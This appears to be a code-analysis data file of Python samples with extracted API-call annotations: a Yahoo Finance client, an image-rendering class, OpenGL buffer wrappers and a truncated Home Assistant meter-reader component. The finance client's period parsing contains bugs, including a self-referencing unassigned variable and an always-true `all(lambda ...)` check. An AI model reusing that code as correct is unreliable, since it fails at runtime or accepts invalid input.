self.query['events'] = None;
raise ValueError(f"value of argument 'events' is not compatible with the given API '{str(self.__api__)}'");
def SetInterval(self, interval:str) -> None:
if not isinstance(interval, str):
self.query['interval'] = None;
raise TypeError(f"invalid type for the argument 'interval'; {type(str)} expected, got {type(interval)}");
else:
if (self.__api__ is AccessModeInQuery.CHART and interval in self.__chart_interval__) \
or (self.__api__ is AccessModeInQuery.DOWNLOAD and interval in self.__download_frequency__):
self.query['interval'] = interval;
else:
self.query['interval'] = None;
raise ValueError(f"value of argument 'interval' is not compatible with the given API '{str(self.__api__)}'");
def SetPeriod(self, period:Union[str,dt.datetime,List[Union[int,dt.datetime]]]) -> None:
if isinstance(period,list) and len(period) is 2 and all(lambda p: isinstance(p,int) or isinstance(p,dt.datetime) or isinstance(p,str) for p in period):
self.query['period1'], self.query['period2'] = self.__parse_periods__(*(period));
elif isinstance(period,str):
if self.__api__ is AccessModeInQuery.CHART and period in self.__chart_range__:
self.query['range'] = period;
else:
raise ValueError(f"value of argument 'period' is not compatible with the given API '{str(self.__api__)}'");
elif isinstance(period,dt.datetime):
self.query['period1'], self.query['period2'] = self.__parse_periods__(period,period);
else:
self.query['period1'], self.query['period2'], self.query['range'] = None, None, None;
raise TypeError(f"invalid type for the argument 'period'; {type(str)} or {type(dt.datetime)} or a list of either {type(int)} or {type(dt.datetime)} expected, got {type(period)}");
@classmethod
def __parse_periods__(cls, value1:Union[dt.datetime,int,str], value2:Union[dt.datetime,int,str]) -> Tuple[int,int]:
# Note that the earliest date that is possible to take into consideration is platform-dependent.
# For compatibility reasons, we do not accept timestamps prior to epoch time 0.
if isinstance(value1,str):
try:
period1 = int(du.isoparse(value1).timestamp());
except (OSError,OverflowError):
period1 = 0;
else:
period1 = max(0,(int(time.mktime(value1.timetuple())))) if isinstance(value1, dt.datetime) else max(0,value1);
if value1==value2:
period2 = period2;
elif isinstance(value2,str):
try:
period2 = int(du.isoparse(value2).timestamp());
except (OSError,OverflowError):
period2 = dt.datetime.now().timestamp();
else:
period2 = max(period1,int(time.mktime(value2.timetuple()))) if isinstance(value2, dt.datetime) else max(period1,value2);
return period1, period2
class Response:
"""
Class to parse and process responses sent back by the Yahoo Finance API.
Use the 'Parse()' method to correctly retrieve data structures in accordance to the chosen 'AccessModeInQuery' API.
"""
def __init__(self, input:Type[requests.models.Response]):
self.__format__:str = "";
self.__error__:Optional[Dict[str, str]] = None;
self.__meta__:Optional[Dict[str, Union[str, int, float]]] = None;
self.__timestamps__:Optional[List[dt.datetime]] = None;
self.__quotes__:Optional[pd.DataFrame] = None;
self.__events__:Optional[pd.DataFrame] = None;
self.__data__:Optional[Union[pd.DataFrame,dict]] = None;
def is_json() -> bool:
nonlocal input;
try:
input = input.json(parse_float=float, parse_int=int);
except ValueError :
return False
else:
return True
if is_json():
if'chart' in input.keys():
self.__format__ = 'chart';
if 'error' in input['chart'].keys():
self.__error__ = self.__response_parser__(input['chart']['error']);
if self.__error__ is None:
data = input['chart']['result'][0];
self.__error__ = {'code':"ok", 'description':"success!"};
self.__meta__ = self.__response_parser__(data['meta']);
self.__timestamps__ = pd.DatetimeIndex(list( map(dt.datetime.utcfromtimestamp, sorted(data['timestamp']))), name=f"Date ({pytz.utc})");
self.__quotes__ = pd.DataFrame({
'Open' : np.array(data['indicators']['quote'][0]['open']),
'High' : np.array(data['indicators']['quote'][0]['high']),
'Low' : np.array(data['indicators']['quote'][0]['low']),
'Close' : np.array(data['indicators']['quote'][0]['close']),
'Adj Close': np.array(data['indicators']['adjclose'][0]['adjclose'])
if 'adjclose' in data['indicators'].keys()
else np.full(len(data['indicators']['quote'][0]['close']),np.NaN),
'Volume' : np.array(data['indicators']['quote'][0]['volume'])},
index=self.__timestamps__);
if 'events' in data.keys():
index = list();
entries = list();
columns = list();
if 'splits' in data['events'].keys():
for split in data['events']['splits'].values():
index.append(split['date']);
entries.append([split['numerator'], split['denominator'], split['denominator']/split['numerator']]);
columns=['From', 'To', 'Split Ratio'];
elif 'dividends' in data['events'].keys():
for dividend in data['events']['dividends'].values():
index.append(dividend['date']);
entries.append(dividend['amount']);
columns=['Dividends'];
index = pd.DatetimeIndex(list(map(lambda ts: dt.datetime.utcfromtimestamp(ts).date(),sorted(index))), name=f"Date ({pytz.utc})");
self.__events__ = pd.DataFrame(entries,index=index,columns=columns);
elif 'finance' in input.keys():
self.__format__ = 'finance';
if 'error' in input['finance'].keys():
self.__error__ = self.__response_parser__(input['finance']['error']);
if self.__error__ is None:
self.__data__ = self.__response_parser__(input['finance']);
else:
self.__format__ = 'finance';
self.__error__ = {'code':"ok", 'description':"success!"};
self.__data__ = pd.read_csv(io.StringIO(input.text),index_col=0,parse_dates=True).sort_index();
def Parse(self) -> Dict[str,Any]:
if self.__format__ == 'chart':
return {'api':'chart', 'meta':self.__meta__, 'quotes':self.__quotes__, 'events':self.__events__, 'error':self.__error__};
elif self.__format__ == 'finance':
return {'api':'download', 'data':self.__data__, 'error':self.__error__};
else:
return {'api': 'unknown', 'error':{'code':"0", 'description':"invalid API"} };
@classmethod
def __response_parser__(cls, d:Any) -> Any:
if d is "null":
return None
elif isinstance(d,dict):
return {key:cls.__response_parser__(value) for key, value in d.items()};
elif isinstance(d,list):
try:
return list(map(float, d));
except :
return d;
elif isinstance(d,str):
try:
return float(d);
except:
return d;
else:
return d
class Session:
"""
A lower level class that explicitly requests data to Yahoo Finance via HTTP.
I provides two 'public' methods:
- With(...): to set the favorite access mode;
- Get(...): to explicitly push request to Yahoo.
It implements a recursive call to the HTTP 'GET' method in case of failure.
The maximum number of attempts has been hardcodedly set to 10.
"""
__yahoo_finance_url__:str = "";
__yahoo_finance_api__:Type[AccessModeInQuery] = AccessModeInQuery.NONE;
def __init__(self):
self.__last_time_checked__ : dt.datetime;
self.__cookies__ : Type[requests.cookies.RequestsCookieJar];
self.__crumb__ : str;
@classmethod
def With(cls, this_api:Type[AccessModeInQuery]) -> 'Session':
if not isinstance(this_api,AccessModeInQuery):
raise TypeError(f"invalid type for the argument 'this_api'; <class 'AccessModeInQuery'> expected, got {type(this_api)}.");
else:
cls.__set_api__(this_api);
cls.__set_url__();
session = cls();
session.__start__();
return session;
@classmethod
def __set_url__(cls) -> None:
if cls.__yahoo_finance_api__ is not AccessModeInQuery.NONE:
cls.__yahoo_finance_url__ = f"https://query1.finance.yahoo.com/v7/finance/{cls.__yahoo_finance_api__}/";
else:
raise UnboundLocalError("session's api has not been set yet");
@classmethod
def __set_api__(cls, input_api:Type[AccessModeInQuery]=AccessModeInQuery.DEFAULT) -> None:
if cls.__yahoo_finance_api__ is not input_api:
cls.__yahoo_finance_api__ = input_api if input_api is not AccessModeInQuery.NONE else AccessModeInQuery.DEFAULT;
#else:
# print(f"*INFO: the session 'api' was already '{input_api}'.");
def __start__(self) -> None:
r = requests.get('https://finance.yahoo.com/quote/SPY/history');
self.__cookies__ = requests.cookies.cookiejar_from_dict({'B': r.cookies['B']});
pattern = re.compile(r'.*"CrumbStore":\{"crumb":"(?P<crumb>[^"]+)"\}');
for line in r.text.splitlines():
crumb_match = pattern.match(line)
if crumb_match is not None:
self.__crumb__ = crumb_match.groupdict()['crumb'];
break;
self.__last_time_checked__ = dt.datetime.now();
def __restart__(self) -> None:
self.__abandon__();
self.__start__();
def __refresh__(self, force:bool=False) -> None:
if force:
self.__restart__();
else:
if self.__last_time_checked__ is not None:
current_time = dt.datetime.now()
delta_secs = (current_time - self.__last_time_checked__).total_seconds()
if delta_secs > 300: # 300 = 5 minutes
self.__restart__();
def __abandon__(self) -> None:
self.__cookies__ = None;
self.__crumb__ = "";
self.__last_time_checked__ = None;
def Get(self, ticker:str, params:Type[Query], attempt:int=0, timeout:int=10, last_error:str="") -> Tuple[bool, dict]:
if not isinstance(ticker,str):
raise TypeError(f"invalid type for the argument 'ticker'! {type(str)} expected; got {type(ticker)}");
if not isinstance(params, Query):
raise TypeError(f"invalid type for the argument 'params'! <class 'Query'> expected; got {type(params)}");
if attempt<10:
query = f"?{str(params)}&crumb={self.__crumb__}" if params else f"?crumb={self.__crumb__}";
url = self.__yahoo_finance_url__ + ticker + query;
try:
response = requests.get(url, cookies=self.__cookies__)
response.raise_for_status();
except requests.HTTPError as e:
if response.status_code in [408, 409, 429]:
time.sleep(timeout);
self.__refresh__();
return self.Get(ticker,params,attempt=attempt+1,timeout=timeout+1,last_error=str(e))
elif response.status_code in [401, 404, 422]:
r = Response(response).Parse();
if r['error']['description'] == "Invalid cookie":
self.__refresh__(force=True);
return self.Get(ticker,params,attempt=attempt+1,timeout=timeout+5,last_error=r['error']['description'])
else:
return True, dict({'code': r['error']['code'], 'description': f"{r['error']['description']} (attempt: {attempt})"});
else :
m = re.match(r'^(?P<code>\d{3})\s?\w*\s?Error\s?:\s?(?P<description>.+)$', str(e));
return True, dict({'code': m['code'], 'description': f"{m['description']} (attempt: {attempt})"});
except requests.Timeout as e:
time.sleep(timeout);
self.__refresh__();
return self.Get(ticker,params,attempt=attempt+1,timeout=timeout+1,last_error=str(e))
except requests.RequestException as e:
if re.search(r"^\s*Invalid\s?URL", str(e)):
time.sleep(timeout);
self.__refresh__();
return self.Get(ticker,params,attempt=attempt+1,timeout=timeout+1,last_error=str(e));
else:
return True, dict({'code': "-1", 'description': f"{str(e)} (attempt: {attempt})"});
else:
r = Response(response).Parse();
if r['error'] is not None and r['error']['code'] is not "ok":
return True, dict({'code': r['error']['code'], 'description': f"{r['error']['description']} (attempt: {attempt})"});
else:
return False, r;
else:
return True, dict({'code': "-2", 'description': "{}\nThe maximum number of attempts has been exceeded!".format(last_error)});
| [
"datetime.datetime.utcfromtimestamp",
"requests.cookies.cookiejar_from_dict",
"dateutil.parser.isoparse",
"re.compile",
"time.sleep",
"requests.get",
"datetime.datetime.now",
"numpy.array",
"pandas.DataFrame",
"io.StringIO"
] | [((12645, 12704), 'requests.get', 'requests.get', (['"""https://finance.yahoo.com/quote/SPY/history"""'], {}), "('https://finance.yahoo.com/quote/SPY/history')\n", (12657, 12704), False, 'import requests\n'), ((12733, 12792), 'requests.cookies.cookiejar_from_dict', 'requests.cookies.cookiejar_from_dict', (["{'B': r.cookies['B']}"], {}), "({'B': r.cookies['B']})\n", (12769, 12792), False, 'import requests\n'), ((12812, 12873), 're.compile', 're.compile', (['""".*"CrumbStore":\\\\{"crumb":"(?P<crumb>[^"]+)"\\\\}"""'], {}), '(\'.*"CrumbStore":\\\\{"crumb":"(?P<crumb>[^"]+)"\\\\}\')\n', (12822, 12873), False, 'import re\n'), ((13128, 13145), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (13143, 13145), True, 'import datetime as dt\n'), ((13445, 13462), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (13460, 13462), True, 'import datetime as dt\n'), ((14458, 14501), 'requests.get', 'requests.get', (['url'], {'cookies': 'self.__cookies__'}), '(url, cookies=self.__cookies__)\n', (14470, 14501), False, 'import requests\n'), ((15674, 15693), 'time.sleep', 'time.sleep', (['timeout'], {}), '(timeout)\n', (15684, 15693), False, 'import time\n'), ((9116, 9167), 'pandas.DataFrame', 'pd.DataFrame', (['entries'], {'index': 'index', 'columns': 'columns'}), '(entries, index=index, columns=columns)\n', (9128, 9167), True, 'import pandas as pd\n'), ((9690, 9713), 'io.StringIO', 'io.StringIO', (['input.text'], {}), '(input.text)\n', (9701, 9713), False, 'import io\n'), ((14671, 14690), 'time.sleep', 'time.sleep', (['timeout'], {}), '(timeout)\n', (14681, 14690), False, 'import time\n'), ((15963, 15982), 'time.sleep', 'time.sleep', (['timeout'], {}), '(timeout)\n', (15973, 15982), False, 'import time\n'), ((4874, 4893), 'dateutil.parser.isoparse', 'du.isoparse', (['value1'], {}), '(value1)\n', (4885, 4893), True, 'import dateutil.parser as du\n'), ((7280, 7328), 'numpy.array', 'np.array', (["data['indicators']['quote'][0]['open']"], {}), "(data['indicators']['quote'][0]['open'])\n", (7288, 7328), True, 'import numpy as np\n'), ((7367, 7415), 'numpy.array', 'np.array', (["data['indicators']['quote'][0]['high']"], {}), "(data['indicators']['quote'][0]['high'])\n", (7375, 7415), True, 'import numpy as np\n'), ((7454, 7501), 'numpy.array', 'np.array', (["data['indicators']['quote'][0]['low']"], {}), "(data['indicators']['quote'][0]['low'])\n", (7462, 7501), True, 'import numpy as np\n'), ((7540, 7589), 'numpy.array', 'np.array', (["data['indicators']['quote'][0]['close']"], {}), "(data['indicators']['quote'][0]['close'])\n", (7548, 7589), True, 'import numpy as np\n'), ((7911, 7961), 'numpy.array', 'np.array', (["data['indicators']['quote'][0]['volume']"], {}), "(data['indicators']['quote'][0]['volume'])\n", (7919, 7961), True, 'import numpy as np\n'), ((5262, 5281), 'dateutil.parser.isoparse', 'du.isoparse', (['value2'], {}), '(value2)\n', (5273, 5281), True, 'import dateutil.parser as du\n'), ((5366, 5383), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (5381, 5383), True, 'import datetime as dt\n'), ((7628, 7683), 'numpy.array', 'np.array', (["data['indicators']['adjclose'][0]['adjclose']"], {}), "(data['indicators']['adjclose'][0]['adjclose'])\n", (7636, 7683), True, 'import numpy as np\n'), ((8989, 9021), 'datetime.datetime.utcfromtimestamp', 'dt.datetime.utcfromtimestamp', (['ts'], {}), '(ts)\n', (9017, 9021), True, 'import datetime as dt\n')] |
import numpy as np
import matplotlib.pyplot as plt
from copy import deepcopy
from ..measure import ConditionedLognormalSampler
class ScalarImage:
"""
Class containing a scalar image.
"""
def __init__(self, height=1000, width=1000):
""" Instantiate scalar image with shape (<height>, <width>). """
self.height = height
self.width = width
self.initialize()
@property
def shape(self):
""" Image shape. """
return self.im.shape[-2:]
@property
def pixels(self):
""" Returns image pixels. """
return self.im.ravel()
@property
def max(self):
""" Maximum pixel intensity. """
return self.im.max()
@property
def im_normalized(self):
""" Image normalized by the maximum value. """
return self.im/self.max
def percentile(self, q):
""" 98th percentile of pixel intensities. """
return np.percentile(self.im.ravel(), q=q)
def initialize(self):
""" Initialize blank image. """
self.im = np.zeros((self.height, self.width), dtype=np.float64)
def fill(self, mu=0.1, sigma=0.1):
"""
Fill image background with values sampled from a lognormal distribution.
Args:
mu (float) - mean of underlying normal distribution
sigma (float) - std dev of underlying normal distribution
"""
pixels = np.exp(np.random.normal(np.log(mu), sigma, size=self.shape))
self.im[:, :] = pixels
@staticmethod
def _render(im, vmin=0, vmax=None, cmap=plt.cm.Greys, size=5, ax=None):
"""
Render image.
Args:
im (np.ndarray[float]) - image
vmin, vmax (int) - colormap bounds
cmap (matplotlib.ColorMap or str) - if value is 'r', 'g', or 'b', use RGB colorscheme
size (int) - image panel size, in inches
ax (matplotlib.axes.AxesSubplot) - if None, create figure
"""
if ax is None:
fig, ax = plt.subplots(figsize=(size, size))
if vmax is None:
vmax = im.max()
# render image
if type(cmap) == str:
assert cmap in 'rgb', 'Color not recognized.'
im_rgb = np.zeros(im.shape+(3,), dtype=np.float64)
im_rgb[:,:,'rgb'.index(cmap)] = (im-vmin)/(vmax-vmin)
im_rgb[im_rgb>1.] = 1.
ax.imshow(im_rgb)
else:
ax.imshow(im, vmin=vmin, vmax=vmax, cmap=cmap)
# invert axis and remove ticks
ax.invert_yaxis()
ax.axis('off')
def render(self, **kwargs):
""" Render image. """
self._render(self.im.T, **kwargs)
def render_blank(self, **kwargs):
""" Render image. """
self._render(np.zeros(self.shape, dtype=int), **kwargs)
def center_xycoords(self, xy, shrinkage=0.9):
""" Project zero-centered coordinates to center of image. """
center_x, center_y = self.shape[0]/2, self.shape[1]/2
centered_xy = deepcopy(xy)
centered_xy[:, 0] = ((xy[:, 0]*center_x*shrinkage) + center_x)
centered_xy[:, 1] = ((xy[:, 1]*center_y*shrinkage) + center_y)
return centered_xy.astype(int)
class DependentScalarImage(ScalarImage):
"""
Class defines a scalar image whose pixel intensities are sampled with some dependence upon another scalar image.
"""
def __init__(self, pixels, mean, sigma):
""" Instantiate a dependent scalar image. """
super().__init__(*pixels.shape)
x = np.log(pixels.ravel())
self.sampler = ConditionedLognormalSampler(x, np.log(mean), sigma)
def fill(self, rho=0.0):
""" Generate randomly sampled pixel values. """
pixels = self.sampler.sample(rho=rho)
self.im[:, :] = pixels.reshape(self.shape)
| [
"numpy.zeros",
"numpy.log",
"matplotlib.pyplot.subplots",
"copy.deepcopy"
] | [((1067, 1120), 'numpy.zeros', 'np.zeros', (['(self.height, self.width)'], {'dtype': 'np.float64'}), '((self.height, self.width), dtype=np.float64)\n', (1075, 1120), True, 'import numpy as np\n'), ((3047, 3059), 'copy.deepcopy', 'deepcopy', (['xy'], {}), '(xy)\n', (3055, 3059), False, 'from copy import deepcopy\n'), ((2046, 2080), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(size, size)'}), '(figsize=(size, size))\n', (2058, 2080), True, 'import matplotlib.pyplot as plt\n'), ((2268, 2311), 'numpy.zeros', 'np.zeros', (['(im.shape + (3,))'], {'dtype': 'np.float64'}), '(im.shape + (3,), dtype=np.float64)\n', (2276, 2311), True, 'import numpy as np\n'), ((2798, 2829), 'numpy.zeros', 'np.zeros', (['self.shape'], {'dtype': 'int'}), '(self.shape, dtype=int)\n', (2806, 2829), True, 'import numpy as np\n'), ((3646, 3658), 'numpy.log', 'np.log', (['mean'], {}), '(mean)\n', (3652, 3658), True, 'import numpy as np\n'), ((1459, 1469), 'numpy.log', 'np.log', (['mu'], {}), '(mu)\n', (1465, 1469), True, 'import numpy as np\n')] |
from ...Renderer.Buffer import VertexBuffer, IndexBuffer, BufferLayout
from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData
from OpenGL.GL import GL_ARRAY_BUFFER, GL_STATIC_DRAW, GL_ELEMENT_ARRAY_BUFFER, GL_DYNAMIC_DRAW
import ctypes
import numpy as np
from multipledispatch import dispatch
class OpenGLVertexBuffer(VertexBuffer):
__slots__ = "__RendererID", "__itemsize", \
"__Layout"
@dispatch(list)
def __init__(self, vertices: list) -> None:
vertices: np.ndarray = np.array(vertices, dtype=np.float32)
self.__itemsize = vertices.itemsize
self.__RendererID = glGenBuffers(1)
glBindBuffer(GL_ARRAY_BUFFER, self.__RendererID)
glBufferData(GL_ARRAY_BUFFER, vertices.nbytes, vertices, GL_STATIC_DRAW)
@dispatch(int)
def __init__(self, size: int) -> None:
vertices = np.zeros((size,))
self.__itemsize = size
self.__RendererID = glGenBuffers(1)
glBindBuffer(GL_ARRAY_BUFFER, self.__RendererID)
glBufferData(GL_ARRAY_BUFFER, vertices.nbytes, ctypes.c_void_p(None), GL_DYNAMIC_DRAW)
def __del__(self) -> None:
glDeleteBuffers(1, [self.__RendererID])
@property
def itemsize(self) -> int:
return self.__itemsize
@property
def RendererID(self) -> int:
return self.__RendererID
def Bind(self) -> None:
glBindBuffer(GL_ARRAY_BUFFER, self.__RendererID)
def Unbind(self) -> None:
glBindBuffer(GL_ARRAY_BUFFER, 0)
def SetLayout(self, layout: BufferLayout) -> None:
self.__Layout = layout
def SetData(self, data: np.ndarray) -> None:
glBindBuffer(GL_ARRAY_BUFFER, self.__RendererID)
glBufferSubData(GL_ARRAY_BUFFER, 0, data.nbytes, data.tobytes())
@property
def Layout(self) -> BufferLayout:
return self.__Layout
class OpenGLIndexBuffer(IndexBuffer):
__RendererID : int
__Count : int
def __init__(self, indices: list) -> None:
indices: np.ndarray = np.array(indices, dtype=np.uint32)
self.__Count = len(indices)
self.__RendererID = glGenBuffers(1)
self.Bind()
glBufferData(GL_ELEMENT_ARRAY_BUFFER, indices.nbytes, indices, GL_STATIC_DRAW)
def __del__(self) -> None:
glDeleteBuffers(1, [self.__RendererID])
@property
def RendererID(self) -> int:
return self.__RendererID
@property
def Count(self) -> int:
return self.__Count
def Bind(self) -> None:
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.__RendererID)
def Unbind(self) -> None:
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0)
| [
"OpenGL.GL.glBufferData",
"OpenGL.GL.glGenBuffers",
"numpy.array",
"numpy.zeros",
"multipledispatch.dispatch",
"ctypes.c_void_p",
"OpenGL.GL.glBindBuffer",
"OpenGL.GL.glDeleteBuffers"
] | [((451, 465), 'multipledispatch.dispatch', 'dispatch', (['list'], {}), '(list)\n', (459, 465), False, 'from multipledispatch import dispatch\n'), ((815, 828), 'multipledispatch.dispatch', 'dispatch', (['int'], {}), '(int)\n', (823, 828), False, 'from multipledispatch import dispatch\n'), ((545, 581), 'numpy.array', 'np.array', (['vertices'], {'dtype': 'np.float32'}), '(vertices, dtype=np.float32)\n', (553, 581), True, 'import numpy as np\n'), ((655, 670), 'OpenGL.GL.glGenBuffers', 'glGenBuffers', (['(1)'], {}), '(1)\n', (667, 670), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((679, 727), 'OpenGL.GL.glBindBuffer', 'glBindBuffer', (['GL_ARRAY_BUFFER', 'self.__RendererID'], {}), '(GL_ARRAY_BUFFER, self.__RendererID)\n', (691, 727), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((736, 808), 'OpenGL.GL.glBufferData', 'glBufferData', (['GL_ARRAY_BUFFER', 'vertices.nbytes', 'vertices', 'GL_STATIC_DRAW'], {}), '(GL_ARRAY_BUFFER, vertices.nbytes, vertices, GL_STATIC_DRAW)\n', (748, 808), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((891, 908), 'numpy.zeros', 'np.zeros', (['(size,)'], {}), '((size,))\n', (899, 908), True, 'import numpy as np\n'), ((969, 984), 'OpenGL.GL.glGenBuffers', 'glGenBuffers', (['(1)'], {}), '(1)\n', (981, 984), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((993, 1041), 'OpenGL.GL.glBindBuffer', 'glBindBuffer', (['GL_ARRAY_BUFFER', 'self.__RendererID'], {}), '(GL_ARRAY_BUFFER, self.__RendererID)\n', (1005, 1041), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((1177, 1216), 'OpenGL.GL.glDeleteBuffers', 'glDeleteBuffers', (['(1)', '[self.__RendererID]'], {}), '(1, [self.__RendererID])\n', (1192, 1216), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((1412, 1460), 'OpenGL.GL.glBindBuffer', 'glBindBuffer', (['GL_ARRAY_BUFFER', 'self.__RendererID'], {}), '(GL_ARRAY_BUFFER, self.__RendererID)\n', (1424, 1460), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((1500, 1532), 'OpenGL.GL.glBindBuffer', 'glBindBuffer', (['GL_ARRAY_BUFFER', '(0)'], {}), '(GL_ARRAY_BUFFER, 0)\n', (1512, 1532), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((1678, 1726), 'OpenGL.GL.glBindBuffer', 'glBindBuffer', (['GL_ARRAY_BUFFER', 'self.__RendererID'], {}), '(GL_ARRAY_BUFFER, self.__RendererID)\n', (1690, 1726), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((2045, 2079), 'numpy.array', 'np.array', (['indices'], {'dtype': 'np.uint32'}), '(indices, dtype=np.uint32)\n', (2053, 2079), True, 'import numpy as np\n'), ((2145, 2160), 'OpenGL.GL.glGenBuffers', 'glGenBuffers', (['(1)'], {}), '(1)\n', (2157, 2160), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((2189, 2267), 'OpenGL.GL.glBufferData', 'glBufferData', (['GL_ELEMENT_ARRAY_BUFFER', 'indices.nbytes', 'indices', 'GL_STATIC_DRAW'], {}), '(GL_ELEMENT_ARRAY_BUFFER, indices.nbytes, indices, GL_STATIC_DRAW)\n', (2201, 2267), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((2308, 2347), 'OpenGL.GL.glDeleteBuffers', 'glDeleteBuffers', (['(1)', '[self.__RendererID]'], {}), '(1, [self.__RendererID])\n', (2323, 2347), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((2537, 2593), 'OpenGL.GL.glBindBuffer', 'glBindBuffer', (['GL_ELEMENT_ARRAY_BUFFER', 'self.__RendererID'], {}), '(GL_ELEMENT_ARRAY_BUFFER, self.__RendererID)\n', (2549, 2593), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((2633, 2673), 'OpenGL.GL.glBindBuffer', 'glBindBuffer', (['GL_ELEMENT_ARRAY_BUFFER', '(0)'], {}), '(GL_ELEMENT_ARRAY_BUFFER, 0)\n', (2645, 2673), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((1097, 1118), 'ctypes.c_void_p', 'ctypes.c_void_p', (['None'], {}), '(None)\n', (1112, 1118), False, 'import ctypes\n')] |
"""Meter Parser Image Processing component and sensor."""
# Copyright 2021 <NAME>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import datetime
import logging
import os
import numpy
import traceback
import voluptuous as vol
from homeassistant.components.sensor import (
STATE_CLASS_TOTAL_INCREASING,
SensorEntity,
SensorEntityDescription,
)
from homeassistant.helpers.restore_state import RestoreEntity
from homeassistant.util import slugify
from .parser_dial import parse_dials
from .parser_digits import parse_digits
from .image_utils import zoom_to_roi
from homeassistant.components.image_processing import (
CONF_ENTITY_ID,
CONF_NAME,
PLATFORM_SCHEMA,
ImageProcessingEntity,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_DEVICE_CLASS,
CONF_SOURCE,
CONF_UNIT_OF_MEASUREMENT,
DEVICE_CLASS_ENERGY,
DEVICE_CLASS_GAS,
DEVICE_CLASS_POWER,
ENERGY_KILO_WATT_HOUR,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
)
from homeassistant.components.light import (
DOMAIN as DOMAIN_LIGHT,
)
from homeassistant.components.camera import (
DOMAIN as DOMAIN_CAMERA,
ENTITY_ID_FORMAT,
)
from homeassistant.core import HomeAssistant, callback, split_entity_id
from homeassistant.helpers import entity_registry as er
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import (
generate_entity_id,
)
from homeassistant.helpers.event import async_call_later
from .const import (
ALLOWED_DEVICE_CLASSES,
ATTRIBUTION,
CONF_DEBUG,
CONF_DECIMALS_COUNT,
CONF_DIAL_SIZE,
CONF_DIALS,
CONF_DIGITS_COUNT,
CONF_METERTYPE,
CONF_OCR_API_KEY,
DEVICE_CLASS_WATER,
DIAL_DEFAULT_READOUT,
DOMAIN,
ICON_ELECTRICITY,
ICON_GAS,
ICON_WATER,
METERTYPEDIALS,
METERTYPEDIGITS,
METERTYPES,
UNITS_OF_MEASUREMENT,
CONF_LIGHT_ENTITY_ID,
)
SOURCE_SCHEMA = vol.Schema(
{
vol.Required(CONF_ENTITY_ID): cv.entity_domain(DOMAIN_CAMERA),
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_LIGHT_ENTITY_ID): cv.entity_domain(DOMAIN_LIGHT),
}
)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_SOURCE): vol.All(cv.ensure_list, [SOURCE_SCHEMA]),
vol.Required(CONF_METERTYPE): vol.In(METERTYPES),
vol.Optional(CONF_OCR_API_KEY): cv.string,
vol.Optional(CONF_DIGITS_COUNT, default=6): cv.positive_int,
vol.Optional(CONF_DECIMALS_COUNT, default=0): cv.positive_int,
vol.Optional(CONF_DEBUG, default=False): cv.boolean,
vol.Required(CONF_DEVICE_CLASS): vol.In(ALLOWED_DEVICE_CLASSES),
vol.Required(CONF_UNIT_OF_MEASUREMENT): vol.In(UNITS_OF_MEASUREMENT),
vol.Optional(CONF_DIALS): cv.ensure_list,
vol.Optional(CONF_DIAL_SIZE, default=100): cv.positive_int,
}
)
try:
# Verify that the OpenCV python package is pre-installed
import cv2
CV2_IMPORTED = True
except ImportError:
CV2_IMPORTED = False
_LOGGER: logging.Logger = logging.getLogger(__package__)
async def async_setup_platform(
hass: HomeAssistant, config: dict, async_add_entities, discovery_info=None
):
"""Set up the Meter Parser platform."""
if not CV2_IMPORTED:
_LOGGER.error(
"No OpenCV library found! Install or compile for your system "
"following instructions here: http://opencv.org/releases.html"
)
return
entities = []
for camera in config[CONF_SOURCE]:
entities.append(
MeterParserMeasurementEntity(
hass,
config,
camera.get(CONF_ENTITY_ID),
camera.get(CONF_LIGHT_ENTITY_ID),
camera.get(CONF_NAME),
)
)
async_add_entities(entities)
class MeterParserMeasurementEntity(ImageProcessingEntity, SensorEntity, RestoreEntity):
"""Measurement entity."""
def __init__(
self,
hass: HomeAssistant,
config: dict,
entity_id: str,
light_entity_id: str,
entity_name: str,
):
"""Initialize."""
super().__init__()
self.hass = hass
self._confidence = 0.7
self._camera = entity_id
self._light = light_entity_id
